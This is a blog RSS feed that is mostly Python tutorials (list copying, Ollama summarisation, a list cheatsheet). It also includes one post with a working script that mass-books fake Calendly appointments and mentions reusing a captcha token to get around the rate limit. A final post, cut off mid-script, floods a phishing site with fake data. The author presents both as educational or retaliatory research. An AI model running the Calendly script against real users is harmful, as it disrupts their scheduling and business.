Python on Nelson Figueroa https://nelson.cloud/categories/python/ Recent content in Python on Nelson Figueroa Nelson Figueroa https://nelson.cloud/opengraph-images/default.png https://nelson.cloud/opengraph-images/default.png en Sat, 28 Mar 2026 23:55:38 -0700 How to Actually Copy a List in Python https://nelson.cloud/how-to-actually-copy-a-list-in-python/?ref=rss Sat, 18 Oct 2025 00:00:00 +0000 https://nelson.cloud/how-to-actually-copy-a-list-in-python/?ref=rss Copy a list in Python using the copy() method, not the assignment operator.

tl;dr:

Use the copy() method.

1

list_a = list_b.copy()

If the list has other lists in it, import copy and use copy.deepcopy() to get fully independent lists.

1
2

import copy
list_a = copy.deepcopy(list_b)

Simple Lists

Say we have two Python lists – list_a and list_b.

If we try to make a copy of list_a and assign it to list_b using the assignment operator =, what really happens is that both list_a and list_b point to the same memory address.

That means that any list-manipulating actions that are done on either list_a or list_b will affect the same list in memory. We don’t actually have two separate lists we can act upon.

In the example below, although we append the integer 4 to list_a, we can see that printing out list_b shows the newly added element. That’s because both list variables point to the same memory address:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

list_a = [1, 2, 3]
list_b = []

list_b = list_a

print(list_b) # [1, 2, 3]

list_a.append(4)

print(list_b) # [1, 2, 3, 4]

Output of the program above:

[1, 2, 3]
[1, 2, 3, 4]

To make an actual copy, use the copy() method. Then, when list_a is modified, it is independent of list_b, because list_b is stored in a separate memory address.

Now if we append the same integer 4 to list_a, list_b will be completely unaffected.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

list_a = [1, 2, 3]
list_b = []

list_b = list_a.copy() # using copy()

print(list_b) # [1, 2, 3]

list_a.append(4)

print(list_a) # [1, 2, 3, 4]
print(list_b) # [1, 2, 3]

Output of the program above:

[1, 2, 3]
[1, 2, 3, 4]
[1, 2, 3]

Here’s more proof. We can print out the memory address of each variable to see when they’re the same and when they differ. We can do this using the id() function.

Here are the same lists from above but this time with their unique identifiers printed out. In this case, the IDs match because both list_a and list_b point to the same memory address.

1
2
3
4
5
6
7

list_a = [1, 2, 3]
list_b = []

list_b = list_a

print(f'list_a address: {id(list_a)}')
print(f'list_b address: {id(list_b)}')

The program above outputs:

list_a address: 140226819497536
list_b address: 140226819497536

The memory addresses are the same.

Now let’s try the same thing but using the copy() method instead of just an assignment operation with =:

1
2
3
4
5
6
7

list_a = [1, 2, 3]
list_b = []

list_b = list_a.copy()

print(f'list_a address: {id(list_a)}')
print(f'list_b address: {id(list_b)}')

The program above outputs:

list_a address: 140264515620480
list_b address: 140264514892160

We can see the memory addresses are different (most obvious due to the ending digits).

Lists Containing Lists, Dictionaries, and Sets

If a list contains other lists, dictionaries, or sets, the copy() method won’t work as expected. The nested lists/dictionaries/sets will still be shared between both lists.

In this scenario, we need to import the copy module and use copy.deepcopy() so that lists/dictionaries/sets inside a list are actually copied to another list.

1
2
3
4

import copy

list_a = [[1, 2], {"a": 1}, {1, 2}]
list_b = copy.deepcopy(list_a)

Although I’ve been in the field for some time, I still have my smooth brain moments. This is a reminder to myself (and whoever reads this) to remember the basics!

References

]]> Local Text Summarization With Ollama and Python Is Just String Manipulation https://nelson.cloud/local-text-summarization-with-ollama-and-python-is-just-string-manipulation/?ref=rss Sun, 24 Aug 2025 00:00:00 +0000 https://nelson.cloud/local-text-summarization-with-ollama-and-python-is-just-string-manipulation/?ref=rss Generate a string with Python, pass it into Ollama, and you get a string in return. That’s it.I’ve used LLMs before but through an interface (i.e. ChatGPT, Gemini, etc) but when I was trying to run a LLM locally I was overthinking how it worked.

Basically, it comes down to this: You pass in a string, and you get a string in return. That’s it.

So if we want to run a LLM locally using Python to summarize files, we build strings with Python and pass them into Ollama. If you want to read in files, open them in Python and concatenate the text with your prompt string. Then pass in the prompt string to Ollama.

Python is just a bridge between you and Ollama.

I’ve included some basic examples. The examples assume you have Ollama installed locally.

Reading a Single File Into Ollama

This is straightforward. Open a file and concatenate the text with a prompt which gets passed into Ollama:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

import ollama

# open a single file
file = open("path/to/file.txt")

# read it and concatenate to the prompt
prompt = f'Can you summarize this file for me? {file.read()}'

# pass in the prompt to Ollama
response = ollama.chat(
    model='gpt-oss:20b',
    messages=[
        {
            'role': 'user',
            'content': prompt
        }
    ]
)

print(response.message['content'])

Reading Multiple Files into Ollama

If you want to pass in multiple files in one prompt, you have to read and concatenate the files into a string, which you then concatenate into the prompt itself.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

import ollama

# open several textfiles
file = open("path/to/file.txt")
file2 = open("path/to/file2.txt")

# concatenate the textfiles into a single string
input = file.read() + file2.read()

# concatenate into the prompt
prompt = f'Can you summarize the following text for me? {input}'

# pass in the prompt to Ollama
response = ollama.chat(
    model='gpt-oss:20b',
    messages=[
        {
            'role': 'user',
            'content': prompt
        }
    ]
)

print(response.message['content'])

Dealing with Context Limits

If you want to read in multiple files but the files are huge, you may exceed the context limits of your model. You can still concatenate files/strings where possible but you can circumvent this by creating several chats. You’re basically running the code more than once, which means you can use a loop.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

import ollama

# open several textfiles and store them in a `files` list.
files = []
files.append(open("path/to/file.txt"))
files.append(open("path/to/file2.txt"))

# run a chat for each file in the list
for file in files:
    prompt = f'Can you summarize the following text for me? {file.read()}'

    # pass in the prompt to Ollama
    response = ollama.chat(
        model='gpt-oss:20b',
        messages=[
            {
                'role': 'user',
                'content': prompt
            }
        ]
    )

    print(response.message['content'])

The code above gives us separate summaries. But what if we want a single summary of all the files involved and they each exceed context limits? We can create a summary of each file, then create a summary of the summaries! It’s all string concatenation when you really think about it.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

import ollama

# save summaries in a list to summarize later on
summaries = []

# open several textfiles and store them in a `files` list.
files = []
files.append(open("path/to/file.txt"))
files.append(open("path/to/file2.txt"))

# run a chat for each file in the list
for file in files:
    prompt = f'Can you summarize the following text for me? {file.read()}'

    # pass in the prompt to Ollama
    response = ollama.chat(
        model='gpt-oss:20b',
        messages=[
            {
                'role': 'user',
                'content': prompt
            }
        ]
    )

    # append the summary of the file to the summaries list for later
    summaries.append(response.message['content'])


# create a single string from our list of summaries
summaries_string = "\n".join(summaries)

# start a final chat to summarize the summaries
prompt = f'Can you summarize the following text for me? {summaries_string}'

response = ollama.chat(
    model='gpt-oss:20b',
    messages=[
        {
            'role': 'user',
            'content': prompt
        }
    ]
)

print(response.message['content'])

That should be enough to get started. Thinking about all of this as just string manipulation made it “click” for me.

References

]]> Calendly Denial of Service via Mass-Scheduling https://nelson.cloud/calendly-denial-of-service-via-mass-scheduling/?ref=rss Thu, 16 May 2024 00:00:00 +0000 https://nelson.cloud/calendly-denial-of-service-via-mass-scheduling/?ref=rss Showing how Calendly can be easily spammed because I’m bored and unemployed.Introduction

I’ve been doing interviews lately and I have been sent several Calendly links.

If you haven’t heard of Calendly, it’s an online scheduling site. You can send someone your Calendly link, and they can see your availability and schedule an appointment.

I noticed that I don’t have to be authenticated any way to be able to schedule an appointment on someone’s calendar. Not great from a security perspective. So I decided to create a free Calendly account and see how easily a theoretical bad actor could abuse it.

The plan is to automate the process of scheduling appointments with Python to fill up someone’s calendar with fake appointments.

Disclaimer:

This is purely for educational purposes. Please do not spam people’s calendars.

Gathering Request URLs, Headers, and Payloads

First, I created a free account at https://calendly.com/signup.

My new Calendly account

The dates and times available are shown in the following screenshot:

Dates available for scheduling

I went through the process of manually creating an appointment in order to capture requests, HTTP verbs, and the URLs they were going to.

This was the final step before creating an appointment:

The process of scheduling an appointment on Calendly

As I went through the process of scheduling and appointment I was keeping track of all the GET requests and their payloads (I chose not to show those here to get to the good stuff sooner). The final request that actually created an appointment was a POST request to https://calendly.com/api/booking/invitees. This is the payload of that request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

{
    "analytics":{
        "referrer_page":null,
        "invitee_landed_at":"2024-05-16T00:39:59.886Z",
        "browser":"Firefox 126",
        "device":"undefined Mac OS X 10.15",
        "fields_filled":1,
        "fields_presented":1,
        "booking_flow":"v3",
        "seconds_to_convert":86
    },
    "embed":{

    },
    "event":{
        "start_time":"2024-05-16T10:30:00-07:00",
        "location_configuration":{
            "location":"",
            "phone_number":"",
            "additional_info":""
        },
        "guests":{

        }
    },
    "event_fields":[
        {
            "id":171096387,
            "name":"Please share anything that will help prepare for our meeting.",
            "format":"text",
            "required":false,
            "position":0,
            "answer_choices":null,
            "include_other":false,
            "value":""
        }
    ],
    "event_type_uuid":"2bf9fee5-e434-44a2-8f1f-15eb42f906f0",
    "invitee":{
        "timezone":"America/Los_Angeles",
        "time_notation":"12h",
        "full_name":"Nelson Figueroa",
        "email":"thisisafakeemail@example.com"
    },
    "payment_token":{

    },
    "recaptcha_token":"03AFcWeA6-bQo_p48-znbKGUevb...<cut for brevity>",
    "single_use_slug":null,
    "tracking":{
        "fingerprint":"a13001d0fcfe7e73a87dfd93e5edf7a5"
    },
    "scheduling_link_uuid":"ckbp-gj5-6gh"
}

Most of the fields aren’t necessary. Through trial and error I noticed I really only need a JSON payload structured like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

{
    "event":{
        "start_time":"2024-05-16T10:30:00-07:00",
        "location_configuration":{
            "location":"",
            "phone_number":"",
            "additional_info":""
        }
    },
    "event_type_uuid":"2bf9fee5-e434-44a2-8f1f-15eb42f906f0",
    "invitee":{
        "timezone":"America/Los_Angeles",
        "time_notation":"12h",
        "full_name":"Nelson Figueroa",
        "email":"thisisafakeemail@example.com"
    }
}

I also made a note of the request headers that I needed for this POST request:

POST /api/booking/invitees HTTP/2
Host: calendly.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Safari/537.36 Gecko/20100101 Firefox/126.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Referer: https://calendly.com/nelsonfigueroa/30min/2024-05-16T10:30:00-07:00?back=1&month=2024-05&date=2024-05-16
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Content-Length: 3324
Origin: https://calendly.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

At this point I had the information I needed to try and mass-create appointments.

Creating a Python Script

I came up with this Python script that makes a few GET requests to figure out what days are available for scheduling and then makes a POST request as previously described:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108

import requests
import time
from datetime import datetime, timedelta
from faker import Faker

# we'll use Faker to generate fake names, emails, etc
fake = Faker()

starting_url = "https://calendly.com/nelsonfigueroa/"
scheduling_url = "https://calendly.com/api/booking/invitees"

# generate today's date for use in range later
today = datetime.today()
today_formatted = today.strftime("%Y-%m-%d")

# generate the date 30 days from today for use in range later
one_year_from_today = today + timedelta(days=30)
one_year_from_today_formatted = one_year_from_today.strftime("%Y-%m-%d")

# GET request to get event types
username = starting_url.split("/")[3]

event_types_url = f"https://calendly.com/api/booking/profiles/{username}/event_types"

response = requests.get(event_types_url)
event_types = response.json()

# event types have the URL paths we need (i.e. /30min)
# we need to get the UUID in the API call
for event_type in event_types:
    uuid = event_type["uuid"]

    # GET request to get the dates available for the event type
    time_zone = "America/Los_Angeles"
    range_start = today_formatted
    range_end = one_year_from_today_formatted
    booking_dates_url = (
        f"https://calendly.com/api/booking/event_types/{uuid}/calendar/range"
    )
    query_string = (
        f"?timezone={time_zone}&range_start={range_start}&range_end={range_end}"
    )
    booking_dates_url += query_string

    response = requests.get(booking_dates_url)
    booking_dates = response.json()
    booking_dates = booking_dates["days"]  # we only need the days

    # check if the user is available on each date
    for booking_date in booking_dates:
        if booking_date["status"] == "available":
            # get open spots for each available date
            open_spots = booking_date["spots"]

            for open_spot in open_spots:
                # we need the starting time for each open spot
                start_time = open_spot["start_time"]

                # we use data we've gathered to generate a payload
                payload = {
                    "event": {
                        "start_time": start_time,
                        "location_configuration": {
                            "location": None,
                            "phone_number": None,
                            "additional_info": None,
                        },
                    },
                    "event_type_uuid": uuid,
                    "invitee": {
                        "full_name": fake.simple_profile()["name"],
                        "email": fake.simple_profile()["mail"],
                        "timezone": time_zone,
                        "time_notation": "12h",
                    },
                }

                headers = {
                    "Host": "calendly.com",
                    "User-Agent": fake.chrome(),
                    "Accept": "application/json, text/plain, */*",
                    "Accept-Language": "en-US,en;q=0.5",
                    "Accept-Encoding": "gzip, deflate, br",
                    "Referer": starting_url,
                    "X-Requested-With": "XMLHttpRequest",
                    "Content-Type": "application/json",
                    "Content-Length": "3924",
                    "Origin": "https://calendly.com",
                    "DNT": "1",
                    "Sec-GPC": "1",
                    "Connection": "keep-alive",
                    "Sec-Fetch-Dest": "empty",
                    "Sec-Fetch-Mode": "cors",
                    "Sec-Fetch-Site": "same-origin",
                    "Pragma": "no-cache",
                    "Cache-Control": "no-cache",
                    "TE": "trailers",
                }

                # finally, send a POST request with our payload to schedule an appointment
                response = requests.post(scheduling_url, json=payload, headers=headers)
                if response.status_code != 200:
                    # for debugging
                    print(f"Status Code: {response.status_code}")
                    print(response.json())
                    print(f"Payload sent: {payload}")
                else:
                    print("Successful request.")

I ran the script for a bit to create appointments. Soon after I started getting emails about appointments being made:

Gmail inbox showing an influx of Calendly appointments

And for further confirmation I also refreshed my Calendly calendar and saw that there were a couple days that are no longer available (May 16 and May 17):

Remaining dates available for scheduling

This was much easier than expected. I didn’t even let my script run indefinitely.

There are Some Security Measures

After (presumably) sending too many requests I started getting a 400 status code in the response along with a message:

1

{'message': 'recaptcha_challenge_required'}

It looks like there are some anti-spam measures in place.

Looking back at the original payload when making a POST request I see that there’s a recaptcha_token in the JSON payload. I believe this is only created in the browser when it’s evident that a real person is using Calendly. I don’t know if there’s a way to automate this in a script.

Either way, someone could manually schedule an appointment, check the browser dev tools to retrieve the token, copy and paste the token into a script, and spam someone’s calendar. I didn’t bother trying myself though because I’ve already determined that Calendly is trivial to abuse even without the recaptcha_token.

Conclusion

Calendly is susceptible to spam.

I can think of a few scenarios where this could do some damage:

  • If you’re a salesperson, something like this would fill up your calendar and prevent potential customers from booking time with you.
  • If you provide support to customers via Calendly, your calendar would also fill up, preventing actual customers from seeking support.
  • If you get spammed, you may take the time to delete appointments and you might accidentally delete some legitimate appointments with real people.

There’s probably a lot more scenarios.

Further Reading

After writing this post I noticed someone else already had the same idea. I hesitated to link this because it’s essentially an advertisement for this company’s product but the article is still somewhat interesting (I have no association with this company). I also think their title is better than mine:

I also noticed that there are Calendly API docs. These would have come in handy earlier but I only found out after I was done. That’s fine though, the process of figuring it all out by inspecting browser requests was fun:

]]> Python Lists Cheatsheet https://nelson.cloud/python-lists-cheatsheet/?ref=rss Mon, 29 Apr 2024 00:00:00 +0000 https://nelson.cloud/python-lists-cheatsheet/?ref=rss A Python lists cheatsheet for coding interviews.This is yet another cheatsheet I made for myself when studying for Leetcode and Hackerrank kinds of interviews. It’s organized in a way that makes sense to me.

I previously made a Ruby Arrays Cheatsheet you can check out.

All examples were tested using the Python 3.12.12 REPL.

Initializing a List

Empty List

1

my_list = []

List with Elements

Initializing a list of integers:

1
2
3
4

my_list = [1, 2, 3, 4, 5]

print(my_list)
# [1, 2, 3, 4, 5]

Initializing a list of strings:

1
2

my_list = ["A", "B", "C"]
# ['A', 'B', 'C']

You can mix different types of elements:

1
2
3
4

my_list = [1, "A", [2, 3], {"my_key": "my_value"}]

print(my_list)
# [1, 'A', [2, 3], {'my_key': 'my_value'}]

Adding Elements

At the Beginning of a List

We can also use insert() to add elements to the beginning of a list by specifying index 0:

1
2
3
4
5

my_list = [1, 2, 3]
my_list.insert(0, 4)

print(my_list)
# [4, 1, 2, 3]

At the End of a List

Use append() to add an element to the end of a list:

1
2
3
4
5

my_list = [1, 2, 3]
my_list.append(4)

print(my_list)
# [1, 2, 3, 4]

At a Specific Index

Use insert() and specify the index and element to add:

1
2
3
4
5

my_list = ["A", "B", "C"]
my_list.insert(1, "D")

print(my_list)
# ['A', 'D', 'B', 'C']

Removing Elements

At the Beginning of a List

We can use del() and specify index 0. This modifies the list in-place:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

my_list = [1, 2, 3, 4]
del(my_list[0])

print(my_list)
# [2, 3, 4]

del my_list[0]

print(my_list)
# [3, 4]

At the End of a List

We can use pop(). Modifies list in-place:

1
2
3
4
5

my_list = [1, 2, 3]
my_list.pop()

print(my_list)
# [1, 2]

We can also use del() and specify the last index, which should be len(list) - 1, but using pop() is a bit cleaner in my opinion.

At a Specific Index

Similar to removing an element from the beginning of the list, except we pass in a different index aside from 0:

1
2
3
4
5

my_list = ['A', 'B', 'C', 'D']
del(my_list[2])

print(my_list)
# ['A', 'B', 'D']

Retrieving Elements

The First Element

There’s no built-in Python method to get the first element as far as I know, just specify index 0 like in most programming languages:

1
2
3
4
5

my_list = ['A', 'B', 'C', 'D']
char = my_list[0]

print(char)
# 'A'

The Last Element

Use index -1 to get the last element of a list. Negative indices start at the end of the list.

1
2
3
4
5

my_list = ['A', 'B', 'C', 'D']
char = my_list[-1]

print(char)
# 'D'

Element at a Specific Index

Similar to other programming languages, specify an index:

1
2
3
4
5

my_list = ['A', 'B', 'C', 'D']
char = my_list[2]

print(char)
# 'C'

Sorting Lists

We can use sort() to sort a list. This modifies the list in-place:

1
2
3
4
5

my_list = [4, 5, 1, 3, 2]
my_list.sort()

print(my_list)
# [1, 2, 3, 4, 5]

We can also use sorted(). This returns a new list and does not modify the original list:

1
2
3
4
5
6
7
8

my_list = [4, 5, 1, 3, 2]
sorted_list = sorted(my_list)

print(my_list)
# [4, 5, 1, 3, 2]

print(sorted_list)
# [1, 2, 3, 4, 5]

Looping Through Lists

Each Element

Use for <element> in <list_name> syntax:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

my_list = ['A', 'B', 'C', 'D']

for char in my_list:
    print(char)

# output:
# A
# B
# C
# D

Each Index

Use range() and len() to loop through a list’s indices:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

my_list = ['A', 'B', 'C', 'D']

for index in range(len(my_list)):
    print(index)

# output:
# 0
# 1
# 2
# 3

Element and Index

Use enumerate() to loop through both elements and indices:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

my_list = ['A', 'B', 'C', 'D']

for index, element in enumerate(my_list):
    print(f'Index: {index}, Element: {element}')

# output:
# Index: 0, Element: A
# Index: 1, Element: B
# Index: 2, Element: C
# Index: 3, Element: D

Other Things to Know

Lists vs Arrays

There are both Arrays and Lists in Python. Arrays are saved contiguously in memory so they are faster for reading but insertion and deletion costs are high. Arrays can only have elements of the same type.

Lists are more flexible. Lists can have elements of different types. The flexibility of Lists results in more memory being used by these data structures.

Here’s an example of an Array of integers being created in Python.

1
2
3
4
5
6
7

import array

# requires a more verbose syntax compared to a List
a = array.array('i', [1, 2, 3, 4, 5])

print(a)
# array('i', [1, 2, 3, 4, 5])

Attempting to add an element that doesn’t match the type of the existing elements results in an error:

1
2
3
4
5
6
7
8

import array

a = array.array('i', [1, 2, 3, 4, 5])
a.append("str")

# Traceback (most recent call last):
#   File "<stdin>", line 1, in <module>
# TypeError: 'str' object cannot be interpreted as an integer

Appending elements of the same type will work as expected:

1
2
3
4
5
6
7

import array

a = array.array('i', [1, 2, 3, 4, 5])
a.append(6)

print(a)
# array('i', [1, 2, 3, 4, 5, 6])

You can learn more about Arrays in this GeeksForGeeks article.

Reversing a List

We can reverse a list using this syntax. This does not modify a list in-place, it returns a new list:

1
2
3
4
5
6
7
8

my_list = [1, 2, 3, 4, 5]
reversed_list = my_list[::-1]

print(my_list)
# [1, 2, 3, 4, 5]

print(reversed_list)
# [5, 4, 3, 2, 1]

We can also use list.reverse() to reverse a list. This modifies the list in-place:

1
2
3
4
5

my_list = [1, 2, 3, 4, 5]
my_list.reverse()

print(my_list)
# [5, 4, 3, 2, 1]

There is also a reversed() function. This function returns an iterator which we can then convert back to a list:

1
2
3
4
5

my_list = [1, 2, 3, 4, 5]
reversed_list = list(reversed(my_list))

print(reversed_list)
# [5, 4, 3, 2, 1]

Get Number of Elements in a List

Use len() to get the number of elements in a list.

1
2
3
4

my_list = ['a', 'b', 'c']

print(len(my_list))
# 3

Count Number of Occurrences

We can check for the number of occurrences of a value in a list using .count(). In the example below, we check to see how many times the number 1 appears in the list, which is 5 times:

1
2
3
4

my_list = [1, 2, 3, 4, 5, 4, 3, 3, 2, 2, 2, 1, 1, 1, 1]

my_list.count(1)
# 5

References

]]> Get Unique Elements in a Python List https://nelson.cloud/get-unique-elements-in-a-python-list/?ref=rss Mon, 22 Apr 2024 00:00:00 +0000 https://nelson.cloud/get-unique-elements-in-a-python-list/?ref=rss Remove duplicate elements from Python lists using the set() function.In Python we can get the unique elements from a list by converting it to a set with set(). Sets are a collection of unique elements:

1
2
3
4
5

values = [1, 1, 1, 2, 2, 3, 3, 3, 3]

values = set(values)

print(values)

Output:

{1, 2, 3}

And if we still need a list instead of a set, we can easily convert back to a list using list():

1
2
3
4
5
6
7
8

values = [1, 1, 1, 2, 2, 3, 3, 3, 3]

# convert to set to get unique values
values = set(values)
# convert back to list
values = list(values)

print(values)

Output:

[1, 2, 3]

Warning:

The order of elements after using set() is not guaranteed. I wrote the examples in order to make it clear that duplicates were removed.

I learned this trick after realizing that unfortunately Python doesn’t have a uniq() method like Ruby that does this exact thing.

There’s also other ways of getting unique values from a list that you can read about in this GeeksforGeeks article. I didn’t cover the other cases because I feel like the easiest way is to use set().

References

]]> Making Life More Difficult for Bank Scammers https://nelson.cloud/making-life-more-difficult-for-bank-scammers/?ref=rss Thu, 22 Feb 2024 00:00:00 +0000 https://nelson.cloud/making-life-more-difficult-for-bank-scammers/?ref=rss Using Python to flood scammers with fake information.If you’ve been around you know I enjoy spamming phishing/scamming sites. I recently received this fake Chase email and decided to go down another phishing/scamming attempt.

Phishing Email

The email linked to a Google Drive link of a PDF.

Google Drive PDF

The PDF itself links to somewhere else. I clicked on the PDF and after some redirects I ultimately landed on a fake Chase login site. Look at the URL lol.

Fake Chase login form

Next, I opened my browser dev tools, I filled in the form and pressed “Sign In”.

A POST request goes out to https://secure005.access.chaise.com.secure-accessaccount.com/submit.php with this payload:

1

{"uid":"1ef25781cb3fd42f981b2bbb183d9887","ip":"138.199.35.102","uagent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0","stp":"0","j_username":"anon","j_password":"password","securityToken":""}

Then I was shown this page:

Error message

And of course on the frontend there’s a message about incorrect credentials. It’s one of the most common tricks these people use.

Attempting to submit new credentials does nothing. I noticed that the “reset your password” link is the only way forward so I clicked that and it took me to this page:

One-time code form

It’s asking for a one-time code. I’m not really sure how they expect people to enter a code that they normally receive after submitting correct credentials. Not only that but they don’t even know the phone number of the user. Either way, I filled in 000000 and hit “Next”.

Another POST request goes out to the same URL as before: https://secure005.access.chaise.com.secure-accessaccount.com/submit.php with this JSON:

1

{"uid":"1ef25781cb3fd42f981b2bbb183d9887","stp":"1","otp":"000000"}

(I think it’s obvious now that the stp parameter that keeps showing up represents the step of the fake password recovery process. And based on the value of step, the logic of submit.php parses the JSON accordingly.)

Then I landed on this page that asks me for my card information:

credit card form

I once again filled the form with fake information and hit “Next”. Another POST request went out to the same URL as before. The main thing that changes here are the headers and the JSON payload.

1

{"uid":"1ef25781cb3fd42f981b2bbb183d9887","stp":"2","cnum":"6504 8764 7593 8248","expd":"03/24","cvv":"333"}

(Also, I haven’t been showing the headers because they’re not that interesting, but I am keeping track of them for scripting purposes later.)

Next, I was shown this form. Notice how the first field says “Full Number”. I’m pretty sure they meant “Full Name” lol.

personal details form

Once again, I filled out and submitted the form.

Once again, a POST request goes out to the same URL. This time the JSON payload looks like this:

1

{"uid":"1ef25781cb3fd42f981b2bbb183d9887","stp":"3","fullname":"Fuck You","bdate":"01/01/1900","ssn":"123-74-6772","phone":"(827) 373-8139","address":"some st","city":"some city","state":"FU","zip":"82920","email":"nah@fu.com"}

The fullname key in the JSON payload confirms that they meant to write “Full Name” in the field as opposed to “Full Number” lol.

After submitting the previous form I was shown yet another one, this time asking for email address and email password. They are really thorough. They also asked for my email in the previous step so that was a bit redundant.

email form

I typed in some fake credentials and submitted the form. A POST request goes out to the same URL as before with the following JSON payload:

1

{"uid":"1ef25781cb3fd42f981b2bbb183d9887","stp":"4","cemail":"nah@fu.com","bdate":"ajlksdasdjl"}

Then I was redirected to the official Chase site:

official chase site

Spamming Fake Information with Python

If you’ve read my previous articles about scams and phishing, you know what’s next. It’s time to write up a Python script to spam these people with fake information and hopefully make their lives harder.

These guys were thorough so I’ll need to dynamically create 5 different payloads and send them to the url. Thankfully it’s the same endpoint for all of these payloads.

I want to dynamically generate headers and payloads that seem as realistic as possible. These scammers were thorough so I want to be thorough in making their lives more difficult (also I’m unemployed right now so I have a lot of free time. Someone please hire me 🥺)

This is the Python script I came up with:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158

from faker import Faker
import requests
import uuid
import random
import string

fake = Faker()
url = "https://secure005.access.chaise.com.secure-accessaccount.com/submit.php"

# headers that are consistent among every request
base_headers = {
    "Host": "secure005.access.chaise.com.secure-accessaccount.com",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://secure005.access.chaise.com.secure-accessaccount.com",
    "DNT": "1",
    "Sec-GPC": "1",
    "Connection": "keep-alive",
    "Referer": "https://secure005.access.chaise.com.secure-accessaccount.com/",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}

step_0_cookie = None
step_1_cookie = None
step_2_cookie = None
step_3_cookie = None
step_4_cookie = None

step_0_payload = None
step_1_payload = None
step_2_payload = None
step_3_payload = None
step_4_payload = None


def generate_headers_and_payloads():
    # telling Python to modify the variables on a global scope
    global step_0_cookie, step_1_cookie, step_2_cookie, step_3_cookie, step_4_cookie, step_0_payload, step_1_payload, step_2_payload, step_3_payload, step_4_payload

    fake_phpsessid = "".join(random.choices(string.ascii_letters + string.digits, k=26))

    step_0_cookie = {
        "Cookie": f"PHPSESSID={fake_phpsessid}; stp=0; ppath=web%2Fauth%2Fdashboard%23%2Fdashboard%2Findex%2Findex"
    }
    step_1_cookie = {
        "Cookie": f"PHPSESSID={fake_phpsessid}; stp=1; ppath=oamo/identity/help/passwordhelp/"
    }
    step_2_cookie = {
        "Cookie": f"PHPSESSID={fake_phpsessid}; stp=2; ppath=oamo/identity/help/passwordhelp/"
    }
    step_3_cookie = {
        "Cookie": f"PHPSESSID={fake_phpsessid}; stp=3; ppath=oamo/identity/help/passwordhelp/"
    }
    step_4_cookie = {
        "Cookie": f"PHPSESSID={fake_phpsessid}; stp=4; ppath=oamo/identity/help/passwordhelp/"
    }

    uid = uuid.uuid4().hex

    step_0_payload = {
        "uid": uid,
        "ip": fake.ipv4(),
        "uagent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0",
        "stp": "0",
        "j_username": fake.simple_profile()["username"],
        "j_password": fake.password(length=12),
        "securityToken": "",
    }

    step_1_payload = {
        "uid": uid,
        "stp": "1",
        "otp": fake.random_int(min=100000, max=999999),
    }

    # the credit card in the payload has spaces in between every 4 digits, so I am replicating this
    credit_card_number = fake.credit_card_number("mastercard")
    # adding spaces in between every 4 digits
    credit_card_number = " ".join(
        [credit_card_number[i : i + 4] for i in range(0, len(credit_card_number), 4)]
    )

    step_2_payload = {
        "uid": uid,
        "stp": "2",
        "cnum": credit_card_number,
        "expd": fake.credit_card_expire(),
